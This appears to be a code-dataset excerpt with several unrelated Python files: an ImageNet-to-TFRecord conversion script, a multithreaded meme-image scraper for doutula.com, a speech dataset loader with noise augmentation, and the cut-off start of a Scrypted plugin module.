source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
build_imagenet_data.py
|
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Converts ImageNet data to TFRecords file format with Example protos.
The raw ImageNet data set is expected to reside in JPEG files located in the
following directory structure.
data_dir/n01440764/ILSVRC2012_val_00000293.JPEG
data_dir/n01440764/ILSVRC2012_val_00000543.JPEG
...
where 'n01440764' is the unique synset label associated with
these images.
The training data set consists of 1000 sub-directories (i.e. labels)
each containing 1200 JPEG images for a total of 1.2M JPEG images.
The evaluation data set consists of 1000 sub-directories (i.e. labels)
each containing 50 JPEG images for a total of 50K JPEG images.
This TensorFlow script converts the training and evaluation data into
a sharded data set consisting of 1024 and 128 TFRecord files, respectively.
train_directory/train-00000-of-01024
train_directory/train-00001-of-01024
...
train_directory/train-00127-of-01024
and
validation_directory/validation-00000-of-00128
validation_directory/validation-00001-of-00128
...
validation_directory/validation-00127-of-00128
Each validation TFRecord file contains ~390 records. Each training TFREcord
file contains ~1250 records. Each record within the TFRecord file is a
serialized Example proto. The Example proto contains the following fields:
image/encoded: string containing JPEG encoded image in RGB colorspace
image/height: integer, image height in pixels
image/width: integer, image width in pixels
image/colorspace: string, specifying the colorspace, always 'RGB'
image/channels: integer, specifying the number of channels, always 3
image/format: string, specifying the format, always'JPEG'
image/filename: string containing the basename of the image file
e.g. 'n01440764_10026.JPEG' or 'ILSVRC2012_val_00000293.JPEG'
image/class/label: integer specifying the index in a classification layer.
The label ranges from [1, 1000] where 0 is not used.
image/class/synset: string specifying the unique ID of the label,
e.g. 'n01440764'
image/class/text: string specifying the human-readable version of the label
e.g. 'red fox, Vulpes vulpes'
image/object/bbox/xmin: list of integers specifying the 0+ human annotated
bounding boxes
image/object/bbox/xmax: list of integers specifying the 0+ human annotated
bounding boxes
image/object/bbox/ymin: list of integers specifying the 0+ human annotated
bounding boxes
image/object/bbox/ymax: list of integers specifying the 0+ human annotated
bounding boxes
image/object/bbox/label: integer specifying the index in a classification
layer. The label ranges from [1, 1000] where 0 is not used. Note this is
always identical to the image label.
Note that the length of xmin is identical to the length of xmax, ymin and ymax
for each example.
Running this script using 16 threads may take around ~2.5 hours on a HP Z420.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from datetime import datetime
import os
import random
import sys
import threading
import numpy as np
from six.moves import xrange # pylint: disable=redefined-builtin
import tensorflow.compat.v1 as tf
tf.app.flags.DEFINE_string('train_directory', '/tmp/',
'Training data directory')
tf.app.flags.DEFINE_string('validation_directory', '/tmp/',
'Validation data directory')
tf.app.flags.DEFINE_string('output_directory', '/tmp/',
'Output data directory')
tf.app.flags.DEFINE_integer('train_shards', 1024,
'Number of shards in training TFRecord files.')
tf.app.flags.DEFINE_integer('validation_shards', 128,
'Number of shards in validation TFRecord files.')
tf.app.flags.DEFINE_integer('num_threads', 8,
'Number of threads to preprocess the images.')
# The labels file contains a list of valid labels are held in this file.
# Assumes that the file contains entries as such:
# n01440764
# n01443537
# n01484850
# where each line corresponds to a label expressed as a synset. We map
# each synset contained in the file to an integer (based on the alphabetical
# ordering). See below for details.
tf.app.flags.DEFINE_string('labels_file',
'imagenet_lsvrc_2015_synsets.txt',
'Labels file')
# This file containing mapping from synset to human-readable label.
# Assumes each line of the file looks like:
#
# n02119247 black fox
# n02119359 silver fox
# n02119477 red fox, Vulpes fulva
#
# where each line corresponds to a unique mapping. Note that each line is
# formatted as <synset>\t<human readable label>.
tf.app.flags.DEFINE_string('imagenet_metadata_file',
'imagenet_metadata.txt',
'ImageNet metadata file')
# This file is the output of process_bounding_box.py
# Assumes each line of the file looks like:
#
# n00007846_64193.JPEG,0.0060,0.2620,0.7545,0.9940
#
# where each line corresponds to one bounding box annotation associated
# with an image. Each line can be parsed as:
#
# <JPEG file name>, <xmin>, <ymin>, <xmax>, <ymax>
#
# Note that there might exist mulitple bounding box annotations associated
# with an image file.
tf.app.flags.DEFINE_string('bounding_box_file',
'./imagenet_2012_bounding_boxes.csv',
'Bounding box file')
FLAGS = tf.app.flags.FLAGS
def _int64_feature(value):
"""Wrapper for inserting int64 features into Example proto."""
if not isinstance(value, list):
value = [value]
return tf.train.Feature(int64_list=tf.train.Int64List(value=value))
def _float_feature(value):
"""Wrapper for inserting float features into Example proto."""
if not isinstance(value, list):
value = [value]
return tf.train.Feature(float_list=tf.train.FloatList(value=value))
def _bytes_feature(value):
"""Wrapper for inserting bytes features into Example proto."""
return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))
def _convert_to_example(filename, image_buffer, label, synset, human, bbox,
height, width):
"""Build an Example proto for an example.
Args:
filename: string, path to an image file, e.g., '/path/to/example.JPG'
image_buffer: string, JPEG encoding of RGB image
label: integer, identifier for the ground truth for the network
synset: string, unique WordNet ID specifying the label, e.g., 'n02323233'
human: string, human-readable label, e.g., 'red fox, Vulpes vulpes'
bbox: list of bounding boxes; each box is a list of integers
specifying [xmin, ymin, xmax, ymax]. All boxes are assumed to belong to
the same label as the image label.
height: integer, image height in pixels
width: integer, image width in pixels
Returns:
Example proto
"""
xmin = []
ymin = []
xmax = []
ymax = []
for b in bbox:
assert len(b) == 4
# pylint: disable=expression-not-assigned
[l.append(point) for l, point in zip([xmin, ymin, xmax, ymax], b)]
# pylint: enable=expression-not-assigned
colorspace = 'RGB'
channels = 3
image_format = 'JPEG'
example = tf.train.Example(features=tf.train.Features(feature={
'image/height': _int64_feature(height),
'image/width': _int64_feature(width),
'image/colorspace': _bytes_feature(colorspace),
'image/channels': _int64_feature(channels),
'image/class/label': _int64_feature(label),
'image/class/synset': _bytes_feature(synset),
'image/class/text': _bytes_feature(human),
'image/object/bbox/xmin': _float_feature(xmin),
'image/object/bbox/xmax': _float_feature(xmax),
'image/object/bbox/ymin': _float_feature(ymin),
'image/object/bbox/ymax': _float_feature(ymax),
'image/object/bbox/label': _int64_feature([label] * len(xmin)),
'image/format': _bytes_feature(image_format),
'image/filename': _bytes_feature(os.path.basename(filename)),
'image/encoded': _bytes_feature(image_buffer)}))
return example
class ImageCoder(object):
"""Helper class that provides TensorFlow image coding utilities."""
def __init__(self):
# Create a single Session to run all image coding calls.
self._sess = tf.Session()
# Initializes function that converts PNG to JPEG data.
self._png_data = tf.placeholder(dtype=tf.string)
image = tf.image.decode_png(self._png_data, channels=3)
self._png_to_jpeg = tf.image.encode_jpeg(image, format='rgb', quality=100)
# Initializes function that converts CMYK JPEG data to RGB JPEG data.
self._cmyk_data = tf.placeholder(dtype=tf.string)
image = tf.image.decode_jpeg(self._cmyk_data, channels=0)
self._cmyk_to_rgb = tf.image.encode_jpeg(image, format='rgb', quality=100)
# Initializes function that decodes RGB JPEG data.
self._decode_jpeg_data = tf.placeholder(dtype=tf.string)
self._decode_jpeg = tf.image.decode_jpeg(self._decode_jpeg_data, channels=3)
def png_to_jpeg(self, image_data):
return self._sess.run(self._png_to_jpeg,
feed_dict={self._png_data: image_data})
def cmyk_to_rgb(self, image_data):
return self._sess.run(self._cmyk_to_rgb,
feed_dict={self._cmyk_data: image_data})
def decode_jpeg(self, image_data):
image = self._sess.run(self._decode_jpeg,
feed_dict={self._decode_jpeg_data: image_data})
assert len(image.shape) == 3
assert image.shape[2] == 3
return image
def _is_png(filename):
"""Determine if a file contains a PNG format image.
Args:
filename: string, path of the image file.
Returns:
boolean indicating if the image is a PNG.
"""
# File list from:
# https://groups.google.com/forum/embed/?place=forum/torch7#!topic/torch7/fOSTXHIESSU
return 'n02105855_2933.JPEG' in filename
def _is_cmyk(filename):
"""Determine if file contains a CMYK JPEG format image.
Args:
filename: string, path of the image file.
Returns:
boolean indicating if the image is a JPEG encoded with CMYK color space.
"""
# File list from:
# https://github.com/cytsai/ilsvrc-cmyk-image-list
blacklist = ['n01739381_1309.JPEG', 'n02077923_14822.JPEG',
'n02447366_23489.JPEG', 'n02492035_15739.JPEG',
'n02747177_10752.JPEG', 'n03018349_4028.JPEG',
'n03062245_4620.JPEG', 'n03347037_9675.JPEG',
'n03467068_12171.JPEG', 'n03529860_11437.JPEG',
'n03544143_17228.JPEG', 'n03633091_5218.JPEG',
'n03710637_5125.JPEG', 'n03961711_5286.JPEG',
'n04033995_2932.JPEG', 'n04258138_17003.JPEG',
'n04264628_27969.JPEG', 'n04336792_7448.JPEG',
'n04371774_5854.JPEG', 'n04596742_4225.JPEG',
'n07583066_647.JPEG', 'n13037406_4650.JPEG']
return filename.split('/')[-1] in blacklist
def _process_image(filename, coder):
"""Process a single image file.
Args:
filename: string, path to an image file e.g., '/path/to/example.JPG'.
coder: instance of ImageCoder to provide TensorFlow image coding utils.
Returns:
image_buffer: string, JPEG encoding of RGB image.
height: integer, image height in pixels.
width: integer, image width in pixels.
"""
# Read the image file.
image_data = tf.gfile.GFile(filename, 'r').read()
# Clean the dirty data.
if _is_png(filename):
# 1 image is a PNG.
print('Converting PNG to JPEG for %s' % filename)
image_data = coder.png_to_jpeg(image_data)
elif _is_cmyk(filename):
# 22 JPEG images are in CMYK colorspace.
print('Converting CMYK to RGB for %s' % filename)
image_data = coder.cmyk_to_rgb(image_data)
# Decode the RGB JPEG.
image = coder.decode_jpeg(image_data)
# Check that image converted to RGB
assert len(image.shape) == 3
height = image.shape[0]
width = image.shape[1]
assert image.shape[2] == 3
return image_data, height, width
def _process_image_files_batch(coder, thread_index, ranges, name, filenames,
synsets, labels, humans, bboxes, num_shards):
"""Processes and saves list of images as TFRecord in 1 thread.
Args:
coder: instance of ImageCoder to provide TensorFlow image coding utils.
thread_index: integer, unique batch to run index is within [0, len(ranges)).
ranges: list of pairs of integers specifying ranges of each batches to
analyze in parallel.
name: string, unique identifier specifying the data set
filenames: list of strings; each string is a path to an image file
synsets: list of strings; each string is a unique WordNet ID
labels: list of integer; each integer identifies the ground truth
humans: list of strings; each string is a human-readable label
bboxes: list of bounding boxes for each image. Note that each entry in this
list might contain from 0+ entries corresponding to the number of bounding
box annotations for the image.
num_shards: integer number of shards for this data set.
"""
# Each thread produces N shards where N = int(num_shards / num_threads).
# For instance, if num_shards = 128, and the num_threads = 2, then the first
# thread would produce shards [0, 64).
num_threads = len(ranges)
assert not num_shards % num_threads
num_shards_per_batch = int(num_shards / num_threads)
shard_ranges = np.linspace(ranges[thread_index][0],
ranges[thread_index][1],
num_shards_per_batch + 1).astype(int)
num_files_in_thread = ranges[thread_index][1] - ranges[thread_index][0]
counter = 0
for s in xrange(num_shards_per_batch):
# Generate a sharded version of the file name, e.g. 'train-00002-of-00010'
shard = thread_index * num_shards_per_batch + s
output_filename = '%s-%.5d-of-%.5d' % (name, shard, num_shards)
output_file = os.path.join(FLAGS.output_directory, output_filename)
writer = tf.python_io.TFRecordWriter(output_file)
shard_counter = 0
files_in_shard = np.arange(shard_ranges[s], shard_ranges[s + 1], dtype=int)
for i in files_in_shard:
filename = filenames[i]
label = labels[i]
synset = synsets[i]
human = humans[i]
bbox = bboxes[i]
image_buffer, height, width = _process_image(filename, coder)
example = _convert_to_example(filename, image_buffer, label,
synset, human, bbox,
height, width)
writer.write(example.SerializeToString())
shard_counter += 1
counter += 1
if not counter % 1000:
print('%s [thread %d]: Processed %d of %d images in thread batch.' %
(datetime.now(), thread_index, counter, num_files_in_thread))
sys.stdout.flush()
writer.close()
print('%s [thread %d]: Wrote %d images to %s' %
(datetime.now(), thread_index, shard_counter, output_file))
sys.stdout.flush()
shard_counter = 0
print('%s [thread %d]: Wrote %d images to %d shards.' %
(datetime.now(), thread_index, counter, num_files_in_thread))
sys.stdout.flush()
def _process_image_files(name, filenames, synsets, labels, humans,
bboxes, num_shards):
"""Process and save list of images as TFRecord of Example protos.
Args:
name: string, unique identifier specifying the data set
filenames: list of strings; each string is a path to an image file
synsets: list of strings; each string is a unique WordNet ID
labels: list of integer; each integer identifies the ground truth
humans: list of strings; each string is a human-readable label
bboxes: list of bounding boxes for each image. Note that each entry in this
list might contain from 0+ entries corresponding to the number of bounding
box annotations for the image.
num_shards: integer number of shards for this data set.
"""
assert len(filenames) == len(synsets)
assert len(filenames) == len(labels)
assert len(filenames) == len(humans)
assert len(filenames) == len(bboxes)
# Break all images into batches with a [ranges[i][0], ranges[i][1]].
spacing = np.linspace(0, len(filenames), FLAGS.num_threads + 1).astype(np.int)
ranges = []
threads = []
for i in xrange(len(spacing) - 1):
ranges.append([spacing[i], spacing[i+1]])
# Launch a thread for each batch.
print('Launching %d threads for spacings: %s' % (FLAGS.num_threads, ranges))
sys.stdout.flush()
# Create a mechanism for monitoring when all threads are finished.
coord = tf.train.Coordinator()
# Create a generic TensorFlow-based utility for converting all image codings.
coder = ImageCoder()
threads = []
for thread_index in xrange(len(ranges)):
args = (coder, thread_index, ranges, name, filenames,
synsets, labels, humans, bboxes, num_shards)
t = threading.Thread(target=_process_image_files_batch, args=args)
t.start()
threads.append(t)
# Wait for all the threads to terminate.
coord.join(threads)
print('%s: Finished writing all %d images in data set.' %
(datetime.now(), len(filenames)))
sys.stdout.flush()
def _find_image_files(data_dir, labels_file):
"""Build a list of all images files and labels in the data set.
Args:
data_dir: string, path to the root directory of images.
Assumes that the ImageNet data set resides in JPEG files located in
the following directory structure.
data_dir/n01440764/ILSVRC2012_val_00000293.JPEG
data_dir/n01440764/ILSVRC2012_val_00000543.JPEG
where 'n01440764' is the unique synset label associated with these images.
labels_file: string, path to the labels file.
The list of valid labels are held in this file. Assumes that the file
contains entries as such:
n01440764
n01443537
n01484850
where each line corresponds to a label expressed as a synset. We map
each synset contained in the file to an integer (based on the alphabetical
ordering) starting with the integer 1 corresponding to the synset
contained in the first line.
The reason we start the integer labels at 1 is to reserve label 0 as an
unused background class.
Returns:
filenames: list of strings; each string is a path to an image file.
synsets: list of strings; each string is a unique WordNet ID.
labels: list of integer; each integer identifies the ground truth.
"""
print('Determining list of input files and labels from %s.' % data_dir)
challenge_synsets = [
l.strip() for l in tf.gfile.GFile(labels_file, 'r').readlines()
]
labels = []
filenames = []
synsets = []
# Leave label index 0 empty as a background class.
label_index = 1
# Construct the list of JPEG files and labels.
for synset in challenge_synsets:
jpeg_file_path = '%s/%s/*.JPEG' % (data_dir, synset)
matching_files = tf.gfile.Glob(jpeg_file_path)
labels.extend([label_index] * len(matching_files))
synsets.extend([synset] * len(matching_files))
filenames.extend(matching_files)
if not label_index % 100:
print('Finished finding files in %d of %d classes.' % (
label_index, len(challenge_synsets)))
label_index += 1
# Shuffle the ordering of all image files in order to guarantee
# random ordering of the images with respect to label in the
# saved TFRecord files. Make the randomization repeatable.
shuffled_index = range(len(filenames))
random.seed(12345)
random.shuffle(shuffled_index)
filenames = [filenames[i] for i in shuffled_index]
synsets = [synsets[i] for i in shuffled_index]
labels = [labels[i] for i in shuffled_index]
print('Found %d JPEG files across %d labels inside %s.' %
(len(filenames), len(challenge_synsets), data_dir))
return filenames, synsets, labels
def _find_human_readable_labels(synsets, synset_to_human):
"""Build a list of human-readable labels.
Args:
synsets: list of strings; each string is a unique WordNet ID.
synset_to_human: dict of synset to human labels, e.g.,
'n02119022' --> 'red fox, Vulpes vulpes'
Returns:
List of human-readable strings corresponding to each synset.
"""
humans = []
for s in synsets:
assert s in synset_to_human, ('Failed to find: %s' % s)
humans.append(synset_to_human[s])
return humans
def _find_image_bounding_boxes(filenames, image_to_bboxes):
"""Find the bounding boxes for a given image file.
Args:
filenames: list of strings; each string is a path to an image file.
image_to_bboxes: dictionary mapping image file names to a list of
bounding boxes. This list contains 0+ bounding boxes.
Returns:
List of bounding boxes for each image. Note that each entry in this
list might contain from 0+ entries corresponding to the number of bounding
box annotations for the image.
"""
num_image_bbox = 0
bboxes = []
for f in filenames:
basename = os.path.basename(f)
if basename in image_to_bboxes:
bboxes.append(image_to_bboxes[basename])
num_image_bbox += 1
else:
bboxes.append([])
print('Found %d images with bboxes out of %d images' % (
num_image_bbox, len(filenames)))
return bboxes
def _process_dataset(name, directory, num_shards, synset_to_human,
image_to_bboxes):
"""Process a complete data set and save it as a TFRecord.
Args:
name: string, unique identifier specifying the data set.
directory: string, root path to the data set.
num_shards: integer number of shards for this data set.
synset_to_human: dict of synset to human labels, e.g.,
'n02119022' --> 'red fox, Vulpes vulpes'
image_to_bboxes: dictionary mapping image file names to a list of
bounding boxes. This list contains 0+ bounding boxes.
"""
filenames, synsets, labels = _find_image_files(directory, FLAGS.labels_file)
humans = _find_human_readable_labels(synsets, synset_to_human)
bboxes = _find_image_bounding_boxes(filenames, image_to_bboxes)
_process_image_files(name, filenames, synsets, labels,
humans, bboxes, num_shards)
def _build_synset_lookup(imagenet_metadata_file):
"""Build lookup for synset to human-readable label.
Args:
imagenet_metadata_file: string, path to file containing mapping from
synset to human-readable label.
Assumes each line of the file looks like:
n02119247 black fox
n02119359 silver fox
n02119477 red fox, Vulpes fulva
where each line corresponds to a unique mapping. Note that each line is
formatted as <synset>\t<human readable label>.
Returns:
Dictionary of synset to human labels, such as:
'n02119022' --> 'red fox, Vulpes vulpes'
"""
lines = tf.gfile.GFile(imagenet_metadata_file, 'r').readlines()
synset_to_human = {}
for l in lines:
if l:
parts = l.strip().split('\t')
assert len(parts) == 2
synset = parts[0]
human = parts[1]
synset_to_human[synset] = human
return synset_to_human
def _build_bounding_box_lookup(bounding_box_file):
"""Build a lookup from image file to bounding boxes.
Args:
bounding_box_file: string, path to file with bounding boxes annotations.
Assumes each line of the file looks like:
n00007846_64193.JPEG,0.0060,0.2620,0.7545,0.9940
where each line corresponds to one bounding box annotation associated
with an image. Each line can be parsed as:
<JPEG file name>, <xmin>, <ymin>, <xmax>, <ymax>
Note that there might exist mulitple bounding box annotations associated
with an image file. This file is the output of process_bounding_boxes.py.
Returns:
Dictionary mapping image file names to a list of bounding boxes. This list
contains 0+ bounding boxes.
"""
lines = tf.gfile.GFile(bounding_box_file, 'r').readlines()
images_to_bboxes = {}
num_bbox = 0
num_image = 0
for l in lines:
if l:
parts = l.split(',')
assert len(parts) == 5, ('Failed to parse: %s' % l)
filename = parts[0]
xmin = float(parts[1])
ymin = float(parts[2])
xmax = float(parts[3])
ymax = float(parts[4])
box = [xmin, ymin, xmax, ymax]
if filename not in images_to_bboxes:
images_to_bboxes[filename] = []
num_image += 1
images_to_bboxes[filename].append(box)
num_bbox += 1
print('Successfully read %d bounding boxes '
'across %d images.' % (num_bbox, num_image))
return images_to_bboxes
def main(unused_argv):
assert not FLAGS.train_shards % FLAGS.num_threads, (
'Please make the FLAGS.num_threads commensurate with FLAGS.train_shards')
assert not FLAGS.validation_shards % FLAGS.num_threads, (
'Please make the FLAGS.num_threads commensurate with '
'FLAGS.validation_shards')
print('Saving results to %s' % FLAGS.output_directory)
# Build a map from synset to human-readable label.
synset_to_human = _build_synset_lookup(FLAGS.imagenet_metadata_file)
image_to_bboxes = _build_bounding_box_lookup(FLAGS.bounding_box_file)
# Run it!
_process_dataset('validation', FLAGS.validation_directory,
FLAGS.validation_shards, synset_to_human, image_to_bboxes)
_process_dataset('train', FLAGS.train_directory, FLAGS.train_shards,
synset_to_human, image_to_bboxes)
if __name__ == '__main__':
tf.app.run()
|
DouTuSpider.py
|
# 抓取斗图网的表情包
# 在原有基础上加上一个多线程:threading 库是 Python 原生多线程处理与控制库
# 亲测抓取一个页面完整的所有图片需要 2 秒左右,比未添加超线程的满了5倍,提速明显
# 继续改进,使用 lxml 的 etree 代替 BeautifulSoup 进一步提升速度
import os
import requests
import threading
from lxml import etree
from Download import dl
def get():
"""创建主文件夹,开始爬取"""
os.mkdir('/Users/yton/Documents/斗图')
os.chdir('/Users/yton/Documents/斗图')
html = etree.HTML(dl.GetHtml('https://www.doutula.com/')) # 用 etree 分析 index
max_span = int(html.xpath('//li')[16].xpath('string(.)')) # 获取最大页的页码
for page in range(1, max_span+1):
url = 'https://www.doutula.com/article/list/?page=' + str(page)
print('[正在抓取]。。。url: ' + url)
html = etree.HTML(dl.GetHtml(url))
getDetail(html)
def getDetail(html):
"""获取子页面的数据"""
href_list = [str(item.xpath('@href')[0]) for item in html.xpath('//a[@class="list-group-item"]')]
for url in href_list:
html = etree.HTML(dl.GetHtml(url))
dir_name = str(html.xpath('//li[@class="list-group-item"]//h3//blockquote//a')[0].xpath('string(.)'))
print('[正在抓取]。。。' + dir_name)
if os.path.exists('/Users/yton/Documents/斗图/' + dir_name): pass
else:
os.mkdir('/Users/yton/Documents/斗图/' + dir_name)
os.chdir('/Users/yton/Documents/斗图/' + dir_name)
getImgs(html)
def getImgs(html):
"""获取图片的名字和"""
img_n = html.xpath('//div[@class="artile_des"]//table//a//img')
img_dict_list = [{'img_name': str(item.xpath('@alt')[0]), 'img_href': str(item.xpath('@src')[0])} for item in img_n]
for img_dict in img_dict_list:
threading.Thread(target=storeImg, args=(img_dict, )).start() # 多线程
def storeImg(img_dict):
"""保存图片"""
print('[正在抓取]。。。' + img_dict['img_name'])
with open(img_dict['img_name'] + '.jpg', 'wb') as p:
p.write(requests.get('http:' + img_dict['img_href']).content)
if __name__ == '__main__':
get()
|
mix_vctk_ljs.py
|
from pathlib import Path
import torch
import hp
from threading import Thread
from queue import Queue
import numpy as np
from audio.audio_io import load_to_torch
from audio.sfx import mix_with_snr
from torch.nn.utils.rnn import pad_sequence
from utils.text import text_to_sequence
from random import randint, sample, random
from .vctk_meta import vctk_meta
class CHIMELoader:
"""
Noise is quite small (500 hours of 16KHz Float)
"""
def __init__(self, wave_path, buffered=True):
self.wave_path = wave_path = list(wave_path.glob("*.wav"))
self.buffered = buffered
self.buffer = {}
print("CHiME : ", len(self.wave_path))
def __len__(self):
return len(self.wave_path)
def __cache__(self, item):
if item in self.buffer:
return self.buffer[item]
else:
return self.__read__(item)
def __read__(self, item):
return load_to_torch(str(self.wave_path[item]), hp.sampling_rate)
def __getitem__(self, item: int):
return self.__cache__(item)
def sample(self):
id = randint(0, len(self) - 1)
return self[id]
class VCTKLoader:
def __init__(self, wave_path, txt_path):
wave_path = wave_path.glob("*.wav")
txt_path = txt_path.glob("*.txt")
id_wave_path = self.id_wave_path = {}
id_txt_path = self.id_txt_path = {}
for file in wave_path:
id_wave_path[file.stem] = file
for file in txt_path:
id_txt_path[file.stem] = file
ids = self.ids = []
for id in id_wave_path.keys():
if id in id_txt_path:
ids.append(id)
print("Found VCTK Wave ", len(self))
def __len__(self):
return len(self.ids)
def __getitem__(self, item):
if isinstance(item, int):
id = self.ids[item]
txt_path = self.id_txt_path[id]
wave_path = self.id_wave_path[id]
with open(str(txt_path), 'r') as f:
text = f.read().strip()
speaker = int(id[1:4])
male = vctk_meta[speaker][1] == "M"
speaker = speaker - 223
wave = load_to_torch(str(wave_path), hp.sampling_rate)
return text.strip(), wave, speaker, male
elif isinstance(item, slice):
items = []
for idx in range(item.start, item.stop):
items.append(self[idx])
return items
def sample(self):
while True:
id = randint(0, len(self) - 1)
text, wave, speaker, male = self[id]
if len(wave) > hp.min_sample_length and len(wave) < hp.max_sample_length:
return text, wave, speaker, male
class LJSpeechLoader:
def __init__(self, wave_path, txt_path):
wave_path = list(wave_path.glob("*.wav"))
self.id_text = id_text = {}
self.ids = ids = []
self.id_wave_path = id_wave_path = {}
with open(str(txt_path), 'r') as f:
for line in f:
l = line.strip().split('|')
id_text[l[0]] = l[2]
for file in wave_path:
id_wave_path[file.stem] = str(file)
if file.stem in id_text:
ids.append(file.stem)
print("Found LJSpeech Wave ", len(self))
def __len__(self):
return len(self.ids)
def __getitem__(self, item:int):
"""
Speaker ID is defined to be one here.
:param item: int of index
:return: "hello, world.", WAVE Torch CPU Float, speaker_id in int, False as female
"""
id = self.ids[item]
text = self.id_text[id]
wave_path = self.id_wave_path[id]
wave = load_to_torch(wave_path, hp.sampling_rate)
return text.strip(), wave, 1, False
def sample(self):
while True:
id = randint(0, len(self) - 1)
text, wave, speaker, male = self[id]
if len(wave) > hp.min_sample_length and len(wave) < hp.max_sample_length:
return text, wave, speaker, male
class MixingLoader:
def __init__(self, loaders, ratio):
"""
Two input must be of the same length
Simple implementation that does not allow change of sampling ratio.
:param loaders: list of loaders like above two
:param ratio: list of int [1, 2] for ratios
"""
self.loaders = loaders
self.ratio = ratio
self.total_ratio = sum(ratio)
self.loader_lottery_pool = []
for loader, cnt in zip(loaders, ratio):
for _ in range(cnt):
self.loader_lottery_pool.append(loader)
self.lengths = [len(loader) for loader in loaders]
self.total_len = sum(self.lengths)
def __len__(self):
return self.total_len
def sample(self):
loader = sample(self.loader_lottery_pool, 1)
return loader[0].sample()
class NoiseAugmentLoader:
def __init__(self, speech_loader, noise_loader):
self.speech_loader = speech_loader
self.noise_loader = noise_loader
def __len__(self):
return len(self.speech_loader)
def sample(self, noise_augment_probability=hp.noise_augment_probability):
augment = random() < noise_augment_probability
text, wave, speaker, male = self.speech_loader.sample()
if augment:
noise_wave = self.noise_loader.sample()
begin = randint(0, len(noise_wave) - len(wave) - 1)
noise_segment = noise_wave[begin: len(wave) + begin]
mixed_wave = mix_with_snr(wave, noise_segment, randint(5, 25))
return text, mixed_wave, speaker, male, True
else:
return text, wave, speaker, male, False
class BinnedBatchLoader:
def __init__(
self,
q_size,
n_loading_threads,
stft: torch.nn.Module,
redundancy=5,
device=hp.device
):
self.loader = NoiseAugmentLoader(
speech_loader=MixingLoader(
[
LJSpeechLoader(hp.ljs_wav_path, hp.ljs_text_path),
VCTKLoader(hp.vctk_wav_path, hp.vctk_text_path)
], [1, 1] if hp.debug else[10, 90]
),
noise_loader=CHIMELoader(hp.part_chime_path)
)
self.stft = stft
# Loading From File System
self.device = device
self.loading_threads = []
self.loading_queue = Queue(maxsize=q_size)
for _ in range(n_loading_threads):
self.loading_threads.append(Thread(target=self.loading_thread))
self.loading_threads[-1].start()
self.r = 1
self.batch_size = 1
self.redundancy = redundancy
self.device = device
self.blocking_threads = Thread(target=self.blocking_thread)
self.blocking_queue = Queue(maxsize=5)
self.blocking_threads.start()
def get_state(self):
return self.loading_queue.qsize(), self.loading_queue.maxsize, self.blocking_queue.qsize(), self.blocking_queue.maxsize
def set_state(self, batch_size, r):
self.batch_size = batch_size
self.r = r
def get_batch(self):
return self.blocking_queue.get()
def loading_thread(self):
while True:
try:
text, wave, speaker, male, augmented = self.loader.sample()
phoneme = text_to_sequence(text, hp.cleaner_names)
phoneme = torch.from_numpy(np.int64(phoneme))
self.loading_queue.put((phoneme.to(self.device, non_blocking=True), wave.to(self.device, non_blocking=True), speaker, augmented))
except Exception as e:
print("Loading Thread Error", str(e))
def get_n(self, n:int):
"""
Getting list of phonemes and waves from loaded instances
:param n: int
:return: list of tuple(phone, wave, wave_len)
wave_len is for sorting.
"""
items = []
for _ in range(n):
phoneme, wave, speaker, augmented = self.loading_queue.get(block=True)
items.append((phoneme, wave, speaker, augmented, len(wave)))
return items
def blocking_thread(self):
while True:
try:
items = self.get_n(self.batch_size * self.redundancy)
# sort items based on the length
# This has to be reversed since we are using the function pack_padded_sequence.
items = sorted(items, key=lambda x: x[-1], reverse=True)
batch_size = self.batch_size
r = self.r
for cnt in range(self.redundancy):
if self.batch_size != batch_size or self.r != r: break
scatter = items[cnt * batch_size: (cnt + 1) * batch_size]
phone, wave, speaker, augmented, wavelen = zip(*scatter)
block = self.packing_batch(phone, wave, speaker, augmented, r)
self.blocking_queue.put(block)
except Exception as e:
print("Blocking Thread Error", str(e))
def packing_batch(self, phone, wave, speaker, augmented, r):
"""
:param phone: list of english phone.
:param wave: list of GPU torch FloatTensor
:param speaker: list of int as speaker ids
:param augmented: list of bools whether the speech is augmented
:return: Phone, Wave, Speaker, Augmented, PhoneLength, WaveLength, FrameLength
All R normalized and zero padded.
"""
phone_lengths = [len(t) for t in phone]
wave_lengths = [len(t) for t in wave]
frame_lengths = [self.stft.sample_to_frame(t) for t in wave_lengths]
norm_frame_lengths = [t // r * r for t in frame_lengths]
norm_sample_lengths = [self.stft.frame_to_sample(t) for t in norm_frame_lengths]
norm_wave = [a[:l] for a, l in zip(wave, norm_sample_lengths)]
Wave = pad_sequence(norm_wave, batch_first=True)
Phone = pad_sequence(phone, batch_first=True)
PhoneLength = torch.LongTensor(phone_lengths).to(self.device)
WaveLength = torch.LongTensor(norm_sample_lengths).to(self.device)
FrameLength = torch.LongTensor(norm_frame_lengths).to(self.device)
Speaker = torch.LongTensor(speaker).to(self.device)
Augmented = torch.LongTensor(augmented).to(self.device)
return Phone, Wave, Speaker, Augmented, PhoneLength, WaveLength, FrameLength, r
def __len__(self):
return len(self.loader)
|
plugin-remote.py
|
from __future__ import annotations
import asyncio
import base64
import gc
import json
import os
import platform
import resource
import shutil
import subprocess
import threading
import time
import zipfile
from asyncio.events import AbstractEventLoop
from asyncio.futures import Future
from asyncio.streams import StreamReader, StreamWriter
from collections.abc import Mapping
from io import StringIO
from os import sys
from typing import Any, Optional, Set, Tuple
import aiofiles
import gi
import scrypted_python.scrypted_sdk.types
from scrypted_python.scrypted_sdk.types import (Device, DeviceManifest,
MediaManager,
ScryptedInterfaceProperty,
Storage)
from typing_extensions import TypedDict
import rpc
gi.require_version('Gst', '1.0')
from gi.repository import GLib, Gst
Gst.init(None)
class SystemDeviceState(TypedDict):
lastEventTime: int
stateTime: int
value: any
class SystemManager(scrypted_python.scrypted_sdk.types.SystemManager):
def __init__(self, api: Any, systemState: Mapping[str, Mapping[str, SystemDeviceState]]) -> None:
super().__init__()
self.api = api
self.systemState = systemState
async def getComponent(self, id: str) -> Any:
return await self.api.getComponent(id)
